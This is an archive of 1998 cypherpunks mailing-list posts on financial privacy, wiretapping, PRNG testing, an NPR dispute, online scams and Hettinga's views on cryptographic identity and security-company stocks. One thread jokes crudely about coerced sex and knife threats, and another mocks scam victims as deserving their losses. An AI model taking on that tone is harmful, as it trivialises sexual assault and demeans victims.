AIYdJN3pI7RcV8mD3tq6ot1+tnngRos7TBOyzQhEn24t4Nzv54JsrKC0GjLgJPji
CXU2V9XfGWh6ANM/+MFoZEc+XShb3ZFVHWmwcLTDP7y5ifVqLs2CioHHuAIQjoTm
UYP00PRAbKKcohUKWA6nzaPjAQTACnQCE0N8dtnpAHkulHW+vCBu/GySXPxhShoh
uKe1OGDym3sKyvhsSIfuERjuQBWRkY0jwvMjeFil7TDZp1mj/+mRKiBN3JwIafdI
m/3izkDsw6mlfGK2vPEL7MG1Kgwt5TX0gnvReZKnJ1nntTHqz6jfOfW0eLJnJaqD
UTCmJmo+MMe6x9SmOxLKU7YIEiCZDzE46tydbRI8B8jcTjuESM+k5Yb4rNHb/wnu
YB8nFb+OFR50EwTvQgsHTB+rd6TiT9aenO8Lctksr4jbB0chAGMR7vUZC6QbO+ie
M7rKBTAAxbEjq/fyZ0hNDcVg7sDcPjc9ZFbDB0++e3CeghHZO/Jsp7/15I7yZG4T
VFzkLCHNUVFRtjAx6TB0J5UTLAf6bbY7HIB4fdjJDdFR1cMNQY+52hEmS7sERpvV
6DmADLHDwXVy3sLw6hKyuSe/2acrSoM3Zsec9tE2dJ+eBIU9z66Nw7MJgveJ7nPc
mf/BkGzIhQTRQfrzuJKz4nmBrzKCA7kcu+KZSwTfnvjUQ2xtgrm+YYcpwIO65xdc
Bp1H30bCufgS0loyH9HVnogtnPu+npzAE572aQOWoNyACfjGFVol2wEC6B3YO/Fk
wIKRYJrizsLaIyFDV978sXwSn9FQ9nvBXMOOM+EUXyxOLDBzYKT4GjQPdxzwwbSz
HMGeVmhF8PFtqRA2FqJOl4ivMRGnuS7pgOmxF4E7iNzDNUEvyMRylfrWZlv5rssX
AIhQotU8pfq1YgQrbvb1NQmweQzI7jVdMbIGkhP9L98fcIP9ODifV2oAfrTqcKvv
hkwfkIs+m5pebAOvgiT6fpDec50rQtY9MegjOnS7+wiFYAJBJNWJfYcF6E7fV6Fl
TMwFH11jvu6mKGu8riA+wf2LHglCL1JdH77nAAnQCFwxC7orga7V4WDsZdnJ/K3x
Q7sngWQErgccvqC4dfqG9f9B3cAddgRgVLBLiDztWrT+Bw==
=zoKi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Fri, 23 Oct 1998 07:11:57 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Censored news topic censored ...
Message-ID: <f12fb1ba188dc46505be1969e25b7530@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



> Would any of the NPR staff or Mr. Suarez would like
> to explain just what happened here?

I'll take a stab: milk spills, people trip, shit happens.

They probably didn't mean it.

But who knows.



-- 

Spy King Communications
spyking@hotmail.com
______________________________________________________
Get Your Private, Free Email at http://www.hotmail.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 23 Oct 1998 21:59:52 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: The Economic Cause of Privacy (fwd)
Message-ID: <199810231328.IAA11609@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 22 Oct 1998 14:25:16 +0200
> From: Anonymous <nobody@replay.com>
> From: bman@barn.pct
> Subject: Re: dbts: The Economic Cause of Privacy

> There is no financial privacy because because those who would like such thing
> have less power (hired guns) than those who would not like it.

That is certainly a valid way of looking at the situation after the laws are
enacted. However, the situation leading up to the laws being created
probably didn't involve (c)overt violent implications. I would posit that we
have no financial privacy is because prior to now (pre-ubiquitous computers)
there was a significant cost in compiling the information because copies had
to be made, people involved, etc. This is all going away.

The base infrastructure changed radicaly and this is bound to effect those
aspects that rely (recognized or not) on specific characteristics (eg cost
to retrieve a single page) will see their 'balance of power' change.

> be lost, and population harvesting (aka taxing) would have to be radically
> changed, and that is expensive. The system is self-supporting.

One potential view of this situation is that the tax burden in a
post-computer economy is significantly different than in a pre-computer
economy. In particular examine the primary source of taxes. Individuals look
to become very ephemeral entities in the near term increasing the costs to
the regulators (local, county, state, federal, special) to monitor
compliance. What is needed is a long-lived, well know contact point between
the source of funds wishing to be taxed and the sink of those same funds.
The most obvious is the business or entity sourcing funds. Because of
regulatory issues such organizations need plenty of documentation in order
to do business. Business has as one of its principle goals long-term profit
(excluding short-term business only for convenience and brevity) which
implies long-term existance. In a computer managed economy the primary tax
point should be the retailer or VAR passed along to the consumer via
increased prices (compensated for by increased paychecks). This also has the
potential for eliminating (or at least reducing significantly) the amount of
registration and forms that need to be done. Such issues could be taken care
of at the time of transaction and anonymously. This could also be used to
impliment a flat tax system that automaticaly takes care of those who are poor.
Exempt basic housing, food and clothing items much like now. Since the poorer
members of society don't buy things like CD's and new jackets each year they
aren't burdened by those tax responsibilties.

> Idea that somehow smart algorithms will bring financial privacy is a good starting
> point for cryptoaddict's wet dream, but in reality has the same chance of
> success as survival rate of armed citizens against the government. Zero.

Hm, I thought that's how this country was formed 200+ years ago...

Actualy people will bring financial privacy via smart algorithms (perhaps).
This will occur when there is either a compeling reason to do it or there is
simply no other way to reach the next platue of technology/civil gestalt.

> Use of government-controlled, issued and supervised payment methods/instruments
> is in place because it is proscribed, not because "money/checks, etc. exist".

True, history traces money back to the dawn of human history when the
concept of government is not really applicable (though despot might be). The
groups were simply too small and non-interactive with other groups to really
class them as a full blown economy. As those groups grew and increased their
interactivity the need for regulating the economy became clearer and
clearer. Those who took on the job obviously wanted something for their
labors so taxes were born. As time went on the roll of taxes increased to
include civil support.

> Money is a highly artificial entity in the first place. It is "natural" to
> use currency-binded valuation as it is natural to go to church. And theorizing
> on money and economy in general has similarities to religious rituals.

Without getting into what natural means (I can't take another theism
discussion right now); there must be something 'natural' or universal about
money since widely seperate and uncommunicative societies have invented the
concept when other as simple technologies didn't translate (compare the 
Egyptian and Aztec use of the wheel - the Aztecs didn't though they knew of
it by using it on toys).

> Therefore constructing computer-assisted anon payment schemes "because it is
> cheaper that way" is pointless.

Not if one of your goals is to decrease cost. This won't suffice for the
sole motivation however. So at least to some degree we agree.

> Money is not there to make your life easier.
> Money exists so that you can be taxed and conditioned to desired behaviour at
> minimal cost.

I'll have to disagree. Money exists to ease the transfer of goods across
geographic and social boundaries, it's a level of abstraction above straight
barter. Taxation is a mechanism for those geographic an social boundaries to
continue to exist while hopefuly providing useful services.

> The only way for society (or loosely coupled individuals) to function without
> abstractions like money (that need organized gun power to maintain) is direct
> exchange of goods and services with enforcement based on close relationships
> between parties. Has been tried, several thousand years ago, and such societies
> were annihilated by others who did organize. Which seems to be the fate of any
> anarchism in general.

These sorts of societal arrangements historicaly don't support the thesis of
anarchism being the root cause of the failure. As a matter of fact,
historicaly there is no example (not even the Icelandic Anarchists traded
with the mainland to a great degree) of a interacting set of societies that
supported an economy involving a anarchy that I am aware of. There are
plenty of examples where (near) anarchist societies have destroyed economies
and socieities.

The primary problem is one of wastage. In a barter economy the amount of
value implicit in every exchange varies greatly. If you trade a chicken for
a duck from one customer and a pig from another, does that mean they should
trade a duck for a pig between themselves? Since the pig farmer doesn't want
a duck since he bought a chicken from me how does the duck vendor entice the
pig owner into buying his duck (especialy when he needs the pig to feed his
family as this is his last duck and pigs are bigger than ducks). Then there
is the issue of geography and how a duck is worth less in the middle of
duck-raising land than in the middle of no-ducks-to-be-seen land.

Money stabalizes the swings in the individual transactions and causes the
economic system as a whole to be more stable and predictable. Perhaps what
we really need to be looking for is a economic model that is dynamic but
predictable to a very great degree. Though I must admit that looks
suspicously like some sort of communism/socialism 'share everything equaly'
style of governments. Though, if you could seperate the monetary aspects of
a government from the legal/social side it could work. Probably at least one
of the seperate-but-equal aspects of a polycratic model;

Religion - Economics - Criminal - Legislative - Executive - Military
(external) - Militia (internal) - Science/Technology - Medicine


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Sat, 24 Oct 1998 00:09:44 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: IP: Enhanced Ability to Tap Cell Phones
In-Reply-To: <199810230804.BAA23905@netcom13.netcom.com>
Message-ID: <v04003a02b2565f2fae4a@[192.168.229.6]>
MIME-Version: 1.0
Content-Type: text/plain



Looks for a real opportunity for civil liberty groups to sponsor Cellular
Crowds gatherings. By this I mean a place where people can exchange
pre-paid cellular phones. Since they are becoming a commodity (cost,
features, etc.) I wouldn't mind swapping mine for someone elses as long as
the amount on the card is the same. Pre-paid air time is still at quite a
premium and roaming is generally restricted, but improving all the time.

--Steve





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 23 Oct 1998 15:38:51 +0800
To: David Honig <honig@sprynet.com>
Subject: Re: PRNGs and testers.
In-Reply-To: <19981021151835.A26267@krdl.org.sg>
Message-ID: <36303797.B5679722@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



David Honig wrote:

> Recall that Ueli's Universal Statistical Test
> is valid only for real sources of entropy.
> PRNGs have zero entropy asymptotically ;-)

Sorry that I haven't yet understood. Could you explain a bit more
from the entropy point of view? In my opinion, a statistical
test does not and should not take into account how a sequence
being tested is obtained. Given is simply a sequence and no other
information and the test should give an answer.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Fri, 23 Oct 1998 10:02:41 +0800
To: phelix@vallnet.com
Subject: Re: Women cannot commit rape?
In-Reply-To: <36307e3d.48462966@news>
Message-ID: <Pine.LNX.3.96.981023092753.10273D-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Oct 1998 phelix@vallnet.com wrote:

> 
> On 22 Oct 1998 13:13:39 -0500, Anonymous <nobody@remailer.ch> wrote:
> 
> >>This is true in the United States as well.  That's why in every state,
> >>technically speaking, their is no crime of "rape" just varying degrees and
> >>types of "criminal sexual assault".  I'm suprised that hasn't trickled down
> >>to france yet.  Rape is defined as forcing someone to have sexual
> >>intercourse.  It doesn't take much imagination to build an argument that
> >>you can't force a man to have sex, after all he had to get aroused.  The
> >>advantage of criminal sexual assualt is that it side steps these kind of
> >>issues by greatly broadening the crime to basicly forcing/manipulating
> >>someone  to engae in any kind of sexual activity.
> >
> >"You get hard right now or I take this knife and cut your balls off
> >sloooowly! You have one minute."
> >
> >That is probably out in left field. I doubt it would happen much.
> 
> How about force feeding him a bottle of viagra.  That might do it.

So forced sodomy is no longer considered rape?  I guess the judge in the
case has never heard of a strap-on...

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ernest Hua" <hua@teralogic-inc.com>
Date: Sat, 24 Oct 1998 01:59:12 +0800
To: <TOTNMAIL@npr.org>
Subject: Re: your note
Message-ID: <009e01bdfeaa$89f3e5c0$4164a8c0@mve21>
MIME-Version: 1.0
Content-Type: text/plain



> Why the tone, Ernest?
>
> Because, in case you haven't been aware of it, accusing a journalist of 
> censorship is a very serious thing. 
>
> Ray Suarez

Mr. Suarez,

Well, in that case, I owe you an apology
for the poor choice of the word "censor",
and I suspected it as much after thinking
about your replies.

I am more accustom to the use of "censor"
not so much in the deliberate and
conspiratorial sense as you might be
taking it.  Allow me to point to the books
by Project Censored, which, I believe,
never directly accuse any news organizations
of deliberately censoring for the purpose
of covering up anything.  Their prime
accusation is that the news mechanism as
a component of a democratic society have
filters whose optimizations have been taken
advantage of by organizations actually
desiring the cover up.

I think the intelligence agencies are
probably good at this (if not, they are not
doing their job), and I am sure the FBI is
a quick study on this topic of just how
fast news spreads through the media, and
how certain news do or do not make it
through the media channels.  The FBI and
the NSA have often been targets of lawsuits
and Congressional scrutiny in the past, so
they probably have organizational structures
to help defend against such scrutiny.  This
does not automagically imply some sort of
big brother conspiracy, but if the resources
are there to spin their agenda, I doubt they
will say, "well this is not ethical to use
for our own purposes ...".

Unlike many right wing extremists, I'm not
even trying to accuse the FBI or the NSA of
deliberately trying to fool the American
public for some evil purposes.  My belief is
that larger and larger secret bureaucracies
have a certain behavior which could have the
net result of undermining democratic
principles, so while it is not the news
organizations fault that they may have been
taken advantage of, we often have to depend
on the news organizations themselves dig
themselves out and to counter act this effect.
Daniel Patrick Moynihan recently released a
book on the topic of secrecy and the effect
on bureaucracy, and I was quite impressed by
the N Y Times excerpt.

By the way, I don't know if you understand why
I'm so concerned about this topic, but I do
want to clear the basic problems:

1.  I am NOT accusing you or TOTN of censoring
    the wiretap topic.
    a.  All connotations of "censor".

2.  I am accusing you and TOTN of censorin
    the topic of the lack of reporting by main
    stream media on that specific hour.
    a.  Only the specific mechanical
        connotation of "censor" which means
        not putting the topic on the air.
    b.  I am questioning the relevance of some
        of the calls relative to mine.
        1)  I will grant that due to the
            mechanism of pre-screens, that you
            might not have understood the
            specific nature of my topic, and
            might have thought I just wanted
            to talk about wire taps.
    c.  I will grant that that there are many
        reasons why stories/items get dropped
        on the floor, mostly not the evil
        conspiratorial reasons.  I can even
        imagine a few of these reasons myself.

However, a discussion of news organizations
and how they decide why one story is dropped
and another is put on is worth knowing (that
was what I wanted to ask you on the air).

On this particular exchange, you might also
want to explain how you pick and choose callers
on the air.  Of course, you cannot put every
caller on the air.  So how do you choose?  Is
there a control of flow factor?  Doubtful in
that particular hour.  I am sure there is some
attempt to limit the digression of the topics.
Is there some intangible mood factor analogous
to a club DJ's emotional sync with the dance
crowd?
    
Ern





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Sat, 24 Oct 1998 03:02:43 +0800
To: cypherpunks@toad.com
Subject: Re: CyberScam
In-Reply-To: <199810231545.RAA01452@replay.com>
Message-ID: <3.0.5.32.19981023111259.007c9100@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain



At 05:45 PM 10/23/98 +0200, you wrote:
>At 09:03 PM 10/22/98 -0700, Kevlar wrote:
>>And you were just kidding.....
>
>I wasn't kidding.  I was absolutely sincere when I told him to shove
>a bowling ball up his ass.

My bad. You were serious. But still...

>
>>http://www.zdnet.com/zdnn/stories/zdnn_smgraph_display/0,4436,2151220,00.h
tml
>>Or search zdnet's site for "scam" and choose "A Bull In Bull Market".
>
>I read the article, and if that level of cluelessness is indicative of the
>mentality of your typical online trader, then they deserve what they
>get.  I found a couple of quotes especially amusing.  These are both
>from John Reed Stark, another official-type thrown into the internet
>without a fucking life preserver, it would seem.
<snip>
>what they get.  Darwinism as applied to capitalism.
-----------------^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Damn.

>
>    "Combine the Web's culture of trust, stir in the greatest bull market
>    in history, add stocks that genuinely have had phenomenal growth,
>    and you have victims who don't have any reason to disbelieve
>    promises of guaranteed 20 percent returns."

It accualy said that in the article? "CULTURE OF TRUST"? Not even our own
government trusts us enough to share enough information with people outside
the US so we can talk to them WITHOUT letting big brother watch. You hear
about all this scandal with the NSA/GOV and that swiss encryption company?
It says right in every piece i've seen that "this went on for many
years"... 5 or 6 I believe... 

Mozilla (NS), IE, and many other less well known (but certianly as popular)
WEB browsers have encryption built right into them, so you can do things
"Securely". Nobody uses their real name on the internet, unless it's for
buisness, and Login/Password lurks around the corner if you know where to
look for it. Is this indicative of a "culture of trust"? 

Naturally this is in compareison to the internet's predacessor (Not
ARPAnet, that was a government project. BBS's came first)
<grumblegrumbledamninternetstoleallthecallersfrommyboardafter5yearsofrunning
itgrumble>, which were mostly free to anyone who came and wanted to dl/ul a
file or post in the message base. And usally if it wasn't open you could
apply for access. 

People ran this software, and everyone knew it was full of holes, and
anyone could format all the hard drives in your box, but they trusted the
total strangers who were calling not to, and for the most part people
DIDN'T... simply because they liked it and didn't want to see it go away.
It used to be that identification was only required when it was necessary
to do something that REQUIRED identification, and half the time there was
an anonymous option hiding somewhere... Now if I want to download some
shareware of the "culture of trust", I gotta type in my name, vital
statics, SIN, rank, mothers maiden name, what I know about the plot to
assisinate Mr.Cigar, and a 3 page essay on why I deserve to use their
shareware that they worked long and hard to make and I'll never pay for.
It's enough to make you NOT want to do it. But we do. We keep comming back
for that thrill of watching the [Percent Complete] box stay at 97% for
hours on end until Windows plays a cheery little tune and pops up a box
telling us "It took to long, I'm not gonna wait for it any more." But I
digress.

>
>The Web's culture of trust?  Oh good, another clueless idiot in charge
>of managing internet services.  What culture of trust is it that I've
>missed in my internet travels?  Is there some online place chock full
>of trusted souls, some Cyber-commune, that I missed?
>
>Oh well, like I said, any idiot that would buy into such an obviously
>fraudulent solicitation deserves what they get.  Is it just working in a
>new medium that makes people such blatant morons, or is it simply
>indicative of the intelligence of your average American?  I'd have to
>say that I'm inclined to believe the latter.
>
-Kevlar
<Webmaster@max-web.com>

Does God know Peano Algebra? Or does she not care if strong atheists
couldnt reason their way out of a trap made of Boolean presumptions?

A little bit of knowledge is a dangerous thing, but zero knowlege is
absolutely subversive.

Overspecialization breeds in weakness. It's a slow death.

Beat your algorithms into swords, your dumb terminals into shields, and
turn virtual machines into battlefields... Let the weak say, "I am strong"
and question authority. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 23 Oct 1998 17:59:08 +0800
To: cypherpunks@cyberpass.net
Subject: No Subject
Message-ID: <199810230921.LAA04316@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:17 AM 10/23/98 +0200, Anonymous wrote:
>Trees cannot be indicted for assasination
>
>-Bono Kennedy

Which prosecutor was it who said that he could get a
grand jury to indict a ham sandwich if he wanted to?


        




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 00:31:44 +0800
To: Vin McLellan <dbs@philodox.com>, e$@vmeng.com
Subject: dbts: Dunkin Donuts, The Mysticism of Identity, Venture Capital,and Talking Frogs
In-Reply-To: <v04003a08b2551ff61c93@[198.115.179.81]>
Message-ID: <v04020a04b2561b978874@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:18 AM -0400 on 10/23/98, Vin McLellan, speaking for legions of
SDTI/RSADSI fans (and, evidently, retainers), wrote:

> 	Jeeez, I hope no one else sprained a finger getting the current
> stock price for Security Dynamics (SDTI).

:-).

> Robert Hettinga
> <rah@shipwright.com> took certain, ummm, dramatic liberties as he
> paraphrased a Boston Globe column yesterday on Bay State stocks that had
> "been discounted so deeply they raise eyebrows."

Memory is a terrible thing to waste. It was midnight. The newspaper was in
the trash in a Dunkin Donuts in Malden somewhere. So? Shoot me? :-).

> "Security Dynamics Technologies Inc. of Bedford, a leader in computer
> security and encryption, has fallen from an April high of 42 1/2 to 12
> yesterday. It traded as low as 6 two weeks ago."

Close enough for an internet rant, I figure. If I though I needed a fact
checker, I should go write a column for the Globe, right?


Frankly, besides the Globe's greater-fool valuation of Verisign, which I
seem to have left in that wastebasket in Malden where it belongs, I can
hardly tell, in any gross sense, the difference between what I said about
SDTI/RSADSI/Verisign from memory and the extended quote Vin blessed us
with, which I have gratefully snipped here for brevity.

Again, I didn't say that SDTI wasn't making money, or even that it didn't
have a significant amount of cash on hand relative to its book value.
Which, because I'm not looking at their annual report, I don't know for a
fact, so don't, um, quote me; I only know what I remember from the papers.
If in fact SDTI did have a large cash hoard, it would make it a buy even in
Ben Graham's book. Which I said, if you remember. Okay. I inferred it.
Maybe. :-).


My point was, even in these days of sky high multiples, the market is
deeply discounting SDTI to the "consensus" estimate of its future cash
flow. Given SDTI's patent standing, and the extreme amount of substitutive
competition for the patents it does control in the long term, the
"consensus" opinion seems fair to me, including valuing the company, yes,
it *was* two weeks ago, lower than the "value" of it's Verisign investment
alone.

> 	Hettinga essays are like handball games: the damn ball is
> ricocheting off the side walls, both ends, the floor and the ceiling.
> Linear coherence and internal consistency are less important than the
> electrostatic energy and the rolling rhetorical thunder

Marvellous. Glad to give you the exercise. I had fun writing it. Nice to
know you had fun chasing my shots all over the court like that. Should I
spot you a few more points next time, just to make it more interesting?


> 	Hettinga's apparent scorn for modern cryptography's obsession with
> strong authentication  -- now manifest in the intensity with which
> professionals worry the issues around PKC binding, key certification,
> digital signatures, CA procedures (and in the demand for smartcards to
> secure X509 certs apart from the networked CPU) -- bespeaks a truly
> iconoclastic mind.

Thank you. I think.

Look, folks, "strong authentication" is not the problem. It's biometric
*identity* which is the problem. Cryptography gives us the ability to do
away with "identity"-based key-mapping altogether. A key is a permission to
do something specific with a microprocessor, no more, or less. It doesn't
"mean" anything else. Certainly, if you go back and look at the actual,
legal, definitions of "signature", or "certificate", they don't mean what
people like Verisign (or say, the State of Utah) says their authentication
technology does.

No offense to the august people who coined those appelations, including
Whit Diffie, et. al., but the words "signature", or "certificate" just
don't cut it, because they cause more confusion than they may be worth.
(Just like "digital bearer settlement"? ...Naww... :-))


Anyway, control of a given cryptographic key is completely orthogonal to
the idea of identity. You can map an identity to it, but you don't have to,
because possession of the key is "permission", "authority", enough, all by
itself. *Who* you give permission to, by name, fingerprint, or physical
address, doesn't matter. And, possession of that key is *only* a function
of cryptography and networks, and not law or biology.

And, so, the *only* time you need a biometrically-identified key is when
you're doing a book-entry transaction, which has been my point in this
whole discussion. You can't send someone to jail for making the wrong
book-entry unless you know who they are, of course. Fortunately, that will
change someday, and probably sooner than most people in the transaction
settlement business realize.

Frankly, the only people who need to know someone's physical identity, or
care about it, are the people who put money at risk in the first place, and
only until the transacted money in question is in their firm control. The
shorter a transaction's latency, the less you care who you're doing
business with. Ultimately, if you're doing an instantaneous digital bearer
transaction, you don't care at all, because it's underwriter validates the
authenticity of the certificate (real use of the word) at the time of the
transaction, and not the person who's giving them to you. Even your trust
of the underwriter is driven by the reputation of the underwriter's *key*
and not your knowlege of where the underwriter lives, right? I mean, you
can trash the reputation of the underwriter just by presenting
cryptographic proof of of the underwriter's fraud, making the underwriter
lose more, on a net present value basis, than what he would gain from the
value of the transaction in question, or even the pool of money in his
reserve account.


Besides, ultimately, creating hierarchies of "certificates" of those
key-to-person maps, ala Verisign/X.BlaBla, is not only a waste of time
economically, it's downright logically impossible. You run right into
Russell's paradox and Goedel's result, for one thing. At the very least,
you remove all the flexibility which makes the technology useful in the
first place.

So, yes, it's just like putting a giant hydrogen bag on a biplane in a
misguided effort to make it fly better  (to beat my metaphor like a dead
horse). :-). Even Verisign, or Entrust, and certainly not Thawte, don't
claim to sell certification hierarchies anymore. Probably because they ran
smack-dab into a bunch of consistance/completeness paradoxes in trying to
doing so.

The only economical solution, is, of course, short-span *local* trust
networks, where self reference is not a problem because the network makes
no pretensions at completeness. Where a buyer trusts the seller's
reputation to his own satisfaction because people *he* trusts say so, and,
more important, the known public reputation of the seller is a good one.

Certainly not that stranglehold on everyone's internet identity which is at
the heart of whatever valuation the "consensus" currently wants to put on
companies like Verisign.

By the way, an economical solution to the problem, where the seller doesn't
have to trust the buyer at all is, of course, digital bearer settlement.


Anyway, this mystification of identity, particularly on an internet where
it will prove economically foolish to do so, is what I have against the
whole X.BlaBla, Grand Unified Human Namespace Hierarchy folks. They're
chasing unicorns through the mists of Avalon, in my opinion.

In the end, the only relations established by keys to other keys on the net
will be *economic* ones, and I guarantee that the structure of *those*
relationships, once mapped, will *not* be hierarical, and only unified on a
relational basis, in the same way that free economies now function. Nor
will the primary purpose of those keys be to find whatever physical person
is controlling a given key at any point in its (probably short) lifetime.


> 	What tucked me in for the night was the declaration -- from R.H.,
> the avatar of DBTS, e-cash, and geodesic recursive auctions -- that
> (venture) capital is or will be counterproductive to entreprenurial
> enterprise in the New Age. Un huh. Doomed, as well, by the hesitation
> inherent in the merely human minds that control its flow (at least in Rob's
> universe of cybernetic fiscal structures.)

Well, I suppose if I can play fast and loose with the contents of the
august Boston Globe in the middle of the night, you're welcome to
mischaracterize me in the same fashion, but I hope I'm forgiven if I try to
patch it up here, just a little bit.


I think that venture capital spends most of its time thinking about how to
establish industrial-era monopolies on intellectual property in a world
where, eventually, it is only wetware -- skill, if you will -- that will
matter. Software, hardware, and resources will ultimately be dependant
activities and will decrease in relative value over time.

Software will be utterly replicable and will be sold recursively, and
untraceably, on a bearer basis, primarily because that's the cheapest way
to safely trade money for information on a ubiquitous geodesic public
network. Given that the price of information is rediculuously time-driven,
the price-structure software markets will be such that not only will the
only people who make the most money be people who actually *write* software
and not hire it done, and that software will be sold in smaller and smaller
bits because the transaction costs will be so low (hey, don't believe me,
believe Ronald Coase :-)), but, finally, the only way to make *new* money
is to create new software which sells. So, no software monopoly opportunity
there, because, you need wetware to make software, and, in a world of
totally anonymous, and cash transacted, free agency, fun legalistic
attempts at physical control, like non-disclosures and non-competes, not to
mention copyright and patent, will eventually be laughably un-useful.

Eventually, hardware itself will be "made" using software, and the machines
which fabricate hardware itself will themselves be dependant on software
for their own construction. The price of manufacturing falls as a result,
becomes geographically hyperdistributed, and, of course, nobody can control
the production of software, see above. So, no permanent hardware monopoly
there.

Resources are, even now, discovered, grown or extracted using the best
possible information, and in the long run, the best possible software. The
ownership of land, therefore, will be *economically* determined by who has
the best information or software to use it with. Notice that even with a
finite supply of land, the value of a given piece of land's output, in real
prices, has consistently fallen over history, because the value of the
information used to generate that output falls over time as well, and the
productivity gains from the use of that information are relatively
permanent and cumulative. So, no permanent resource monopoly opportunities
in resources, either. Ask your average aristocrat, or even a farmer, if you
don't believe me. :-).


So, yes, I'll let people quibble about how long "eventually" means, or even
what their definition of "is" is :-), and, in that rather large economic
lacuna, you could drive several late-industrial fortunes through, and we
may or may not need venture capitalists to exploit on those market
inefficiencies, right now, today.

Nonetheless, we converge to a world where venture capital is a waste of
time, and, I think that businesses like Yahoo, and several other internet
ventures whose revenues are not under water, are proving that. For most
first-mover internet companies, the continued interest of venture
capitalists in your company may be, like cocaine, god's paradoxical way of
telling you you're making a lot of money.

The quest for economic rents is at the heart of any economy, certainly, but
I think that, sooner or later, venture capitalists will simply be in the
way between producers and the retained earning their customers are too only
happy give them. Any requirement for equity itself will probably be
underwritten directly to the public someday, and, if you want to call the
intermediaries who underwrite that, what, micro-equity(?), "venture
capitalists", you'll get a lot of argument from the people who already do
equity underwriting today, the investment bankers.

So, you're right, Vin. I *am* blaming venture capitalists for eventually
not being able to think fast enough to keep up, and that, someday, most
underwriting of equity itself will be an extremely automated process. Hell,
most investment bankers themselves will tell you that underwriting is so
mechanical these days that the only real money's in mergers and
acquisitions, anyway.


> 	Gotta love a guy who can write a sentence like that, knot and and
> double-knot it into a gangly tapestry -- and then glue the whole thing
> across a wonderful image like a "dirigible biplane."
>
> 	(That's a Hettinga vehicle is ever there was one. Even in the
> imagination, it pushes or pulls large amounts of gas around in an unusually
> muscular way;-)

Thank you. Insult me any way you want, as long as you spell my name right,
I guess. Dismissing me personally as an iconoclast doesn't dismiss what
I've said, certainly.

In the meantime, it's nice to know that I can say something about a public
company in passing on a few email lists and drive so many of its
shareholders, employees, and retainers to such vigorous distraction. My
phone was ringing off the hook yesterday, which was, certainly, a lot of
fun.


In the meantime, Vin, hang on to your SDTI stock, but probably just for
it's residual value to some future investor, like SDTI evidently bought
RSADSI for its own residual value, and, aparently, for whatever mystical
value the market now puts on Verisign.

It's just a shame that RSADSI didn't just license all that cool crypto to
the developers outright and make a whole lot more money, rather than
playing dog in the manger with it for so long, up to, and probably
including, calling the down export control Feds on a hapless kitchen-table
crypto developer named Zimmermann.


So, right now, after all that, um, exercise, SDTI/RSADSI/Verisign reminds
me an awful lot of that old joke about the two old Texas spinsters who,
walking down a dusty road, came across a talking frog claiming to turn into
an oil baron, if only one of them would kiss him to prove it.

"A talking frog", said one of them, putting the frog in her apron pocket,
"is worth something."


Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 24 Oct 1998 00:39:45 +0800
To: cypherpunks@toad.com
Subject: dog stocks
Message-ID: <v04020a06b25652aa7b30@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



Don't shoot me, shoot the remailer operator. :-).

*I* couldn't have said the following...

Now, where *is* that Walter Winchell hat?

Cheers,
Bob Hettinga

--- begin forwarded text


Date: Fri, 23 Oct 1998 12:20:28 +0200
From: Anonymous <nobody@replay.com>
Comments: This message did not originate from the Sender address above.
	It was remailed automatically by anonymizing remailer software.
	Please report problems or inappropriate use to the
	remailer administrator at <abuse@replay.com>.
Subject: dog stocks
To: Robert Hettinga <rah@shipwright.com>
Status: U

of course this information should be laundered.... Remember Mr. McLellan is
an SDTI partisan.

SDTI *is* a dog stock.  It has problems.

(1) SecureID is decade-old technology.  They are ripe for competitors to
steal the business away from them, because of their business model.
They've yet to come up with any second trick for that pony.


(2) RSADSI is an anchor on the company.  RSADSI revenues have been flat for
six quarters; the most profitable thing they do is their little January
conference -- except for owning part of Verisign.  Sept. 30 2000 is fast
approaching and they have no plan on how they will compete once they no
longer have a patent to club people with.  The most profitable thing SDTI
